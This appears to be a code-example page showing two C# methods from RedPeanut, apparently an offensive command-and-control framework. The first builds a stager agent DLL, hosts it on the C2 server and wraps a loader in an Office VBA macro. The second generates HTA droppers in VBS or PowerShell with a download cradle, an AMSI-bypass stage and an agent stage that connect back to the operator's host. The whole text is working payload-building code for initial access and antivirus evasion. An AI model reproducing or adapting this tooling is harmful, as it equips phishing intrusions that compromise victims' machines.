コード例 #1
0
        private void Run()
        {
            List <string> args = new List <string>();

            try
            {
                if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
                {
                    return;
                }
                else
                {
                    // Parse .cs sorce and repalce variable
                    string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                    if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                    {
                        //Building agent
                        ListenerConfig conf   = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                        string         source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                        source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 35, conf);
                        string outfilename = RandomAString(10, new Random()) + ".dll";
                        Builder.GenerateDll(source, outfilename, 35);

                        //Add resource to webserver
                        C2Manager c2manager = Program.GetC2Manager();
                        c2manager.GetC2Server().RegisterWebResource(outfilename, new WebResourceInstance(null, outfilename));

                        string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri.TrimStart('/');
                        if (!uricontent.EndsWith("/"))
                        {
                            uricontent += "/";
                        }

                        string resourcepath = uricontent + outfilename;

                        //Build shooter assembly
                        source = File.ReadAllText(Path.Combine(folderrpath, SHOOTER_TEMPLATE));
                        source = Replacer.ReplaceAgentShooter(source, resourcepath, conf);

                        string assemblyBase64 = Builder.GenerateDllBase64(source, RandomAString(10, new Random()) + ".dll", 35);

                        VBAGenerator gen = new VBAGenerator(assemblyBase64, null);

                        //Write file to dest dir
                        string destdir = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, EVILCLIPPY_FOLDER);
                        File.WriteAllText(Path.Combine(destdir, filename), gen.GetScriptText());
                        Console.WriteLine("[*] {0} Created", Path.Combine(destdir, filename));
                    }
                }
            }
            catch (Exception e)
            {
                Console.WriteLine("[*] Error running task build {0}", e.Message);
                return;
            }
        }
コード例 #2
0
        private void Run()
        {
            List <string> args = new List <string>();

            try
            {
                if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1)
                {
                    return;
                }
                else
                {
                    if (lang == "vbs")
                    {
                        string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                        if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                        {
                            //Building agent
                            ListenerConfig conf   = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                            string         source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                            source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 35, conf);
                            string outfilename = RandomAString(10, new Random()) + ".dll";
                            Builder.GenerateDll(source, outfilename, 35);

                            //Add resource to webserver
                            C2Manager c2manager = Program.GetC2Manager();
                            c2manager.GetC2Server().RegisterWebResource(outfilename, new WebResourceInstance(null, outfilename));

                            string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri.TrimStart('/');
                            if (!uricontent.EndsWith("/"))
                            {
                                uricontent += "/";
                            }

                            string resourcepath = uricontent + outfilename;

                            //Build shooter assembly
                            source = File.ReadAllText(Path.Combine(folderrpath, SHOOTER_TEMPLATE));
                            source = Replacer.ReplaceAgentShooter(source, resourcepath, conf);

                            string assemblyBase64 = Builder.GenerateDllBase64(source, RandomAString(10, new Random()) + ".dll", 35);

                            HtaVBSGenerator gen = new HtaVBSGenerator(assemblyBase64, null);

                            if (hosted)
                            {
                                //Add resource to webserver storage
                                c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename));
                                Console.WriteLine("[*] Resource added to webserver resources");
                                Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename);
                                return;
                            }
                            else
                            {
                                //Write file to tmp env dir
                                File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText());
                                Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
                            }
                        }
                    }
                    else
                    {
                        if (lang == "powershell")
                        {
                            string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
                            if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile))
                            {
                                string         psfilename = RandomString(10, new Random()) + ".ps1";
                                ListenerConfig conf       = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile);
                                string         source     = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE));
                                source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf);

                                string assemblyBase64 = Builder.GenerateDllBase64(source, RandomString(10, new Random()) + ".dll");

                                Dictionary <string, string> arg = new Dictionary <string, string>();
                                arg.Add("#{lhost}", lhost);
                                arg.Add("#{lport}", lport.ToString());

                                string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri;

                                uricontent = uricontent.TrimStart('/');

                                if (!uricontent.EndsWith("/"))
                                {
                                    uricontent += "/";
                                }

                                arg.Add("#{uri}", uricontent + "s2_" + psfilename);

                                byte[] assemblybytte   = Convert.FromBase64String(assemblyBase64);
                                string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte));

                                Dictionary <string, string> argagent = new Dictionary <string, string>();
                                argagent.Add("#{bytelen}", assemblybytte.Length.ToString());

                                PowershellCradleGenerator gen_s0 = new PowershellCradleGenerator(agentCompBase64, arg);
                                PowershellAmsiGenerator   gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg);
                                PowershellAgentGenerator  gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent);

                                HtaPowerShellGenerator gen = new HtaPowerShellGenerator(gen_s0.GetScriptText(), null);

                                if (hosted)
                                {
                                    //Add resource to webserver storage
                                    C2Manager c2manager = Program.GetC2Manager();

                                    c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename));
                                    c2manager.GetC2Server().RegisterWebResource(psfilename, new WebResourceInstance(gen_s1, psfilename));
                                    c2manager.GetC2Server().RegisterWebResource("s2_" + psfilename, new WebResourceInstance(gen_s2, "s2_" + psfilename));
                                    Console.WriteLine("[*] Resource added to webserver resources");
                                    Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename);
                                    return;
                                }
                                else
                                {
                                    //Write file to tmp env dir
                                    File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText());
                                    File.WriteAllText(Path.Combine(Path.GetTempPath(), psfilename), gen_s1.GetScriptText());
                                    File.WriteAllText(Path.Combine(Path.GetTempPath(), "s2_" + psfilename), gen_s2.GetScriptText());

                                    Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename));
                                    Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), psfilename));
                                    Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), "s2_" + psfilename));
                                }
                            }
                        }
                        else
                        {
                            Console.WriteLine("[*] Language not supported {0} (powershell,vbs)", lang);
                            return;
                        }
                    }
                }
            }catch (Exception e)
            {
                Console.WriteLine("[*] Error running task build {0}", e.Message);
                return;
            }
        }